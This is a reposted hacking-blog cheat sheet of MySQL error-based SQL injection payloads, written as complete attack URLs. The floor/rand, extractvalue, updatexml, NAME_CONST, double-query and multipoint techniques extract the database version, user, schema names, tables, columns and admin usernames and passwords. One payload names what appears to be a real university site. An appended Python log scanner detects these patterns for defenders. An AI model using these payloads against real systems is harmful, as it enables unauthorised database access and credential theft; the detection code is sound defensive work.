Summary of MySQL Error-Based Injection Methods
Source: Internet; Published: install ubuntu; Editor: 程序博客网; Time: 2024/06/09 17:58
1. Error via floor
/* Database version */
http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/* Connected user */
http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/* Current database */
http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/* Enumerate databases */
http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/* Enumerate tables */
http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/* Enumerate columns */
http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/* Dump contents */
http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
2. ExtractValue (length-limited, at most 32 characters)
http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e, (select @@version),0x7e))
http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))
3. UpdateXml (length-limited, at most 32 characters)
http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)
4. NAME_CONST (applies to older versions)
http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261 and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--
5. Error based Double Query Injection (http://www.vaibs.in/error-based-double-query-injection/)
/* Database version */
http://www.hackblog.cn/sql.php?id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1
6. Multipoint (new method)
/* Database version */
http://www.hackblog.cn/sql.php?id=1 and 1=(select multipoint((select * from(select * from(select version())f)x)))
Find the keyword in each statement and replace it with whatever you want to query.
This article is original to Hack Blog; if you repost it, cite the original link http://www.hackblog.cn/post/36.html
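Added example, not part of the original post: a Python access-log check, written from the defending side, that flags requests whose query string contains the error-forcing functions from sections 1-6. The log lines, client addresses and the function names classify and scan are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# One signature per technique listed on this page (sections 1-6).
# floor(rand()) and GROUP BY may appear in either order (sections 1 and 5).
SIGNATURES = {
    "floor/rand group by": re.compile(
        r"(?=.*floor\s*\(\s*rand\s*\()(?=.*group\s+by)", re.S),
    "extractvalue": re.compile(r"\bextractvalue\s*\("),
    "updatexml": re.compile(r"\bupdatexml\s*\("),
    "name_const": re.compile(r"\bname_const\s*\("),
    "multipoint": re.compile(r"\bmultipoint\s*\("),
}
# Client address and request target from a common/combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log; addresses are from documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /sql.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /sql.php?id=1%20and%20'
    'extractvalue(1,concat(0x7e,(select%20@@version),0x7e)) HTTP/1.1" 200 731',
    '203.0.113.9 - - [01/Jan/2024:10:00:06 +0000] "GET /sql.php?id=1%20or%201%20group%20by%20'
    'concat_ws(0x7e,version(),floor(rand(0)*2))%20having%20min(0)%20or%201 HTTP/1.1" 200 745',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /docs.php?q=floor+plan+updates HTTP/1.1" 200 1024',
]

def classify(query):
    """Return the names of the error-based techniques seen in a raw query string."""
    # Percent-decode, collapse whitespace and lowercase before matching.
    text = re.sub(r"\s+", " ", unquote_plus(query)).lower()
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan(log_lines):
    """Return (line_number, client, techniques) for each flagged request."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line this parser understands
        techniques = classify(urlsplit(m.group(2)).query)
        if techniques:
            hits.append((n, m.group(1), techniques))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A match marks a request for review; the underlying fix is still parameterized queries and not returning database error text to the client.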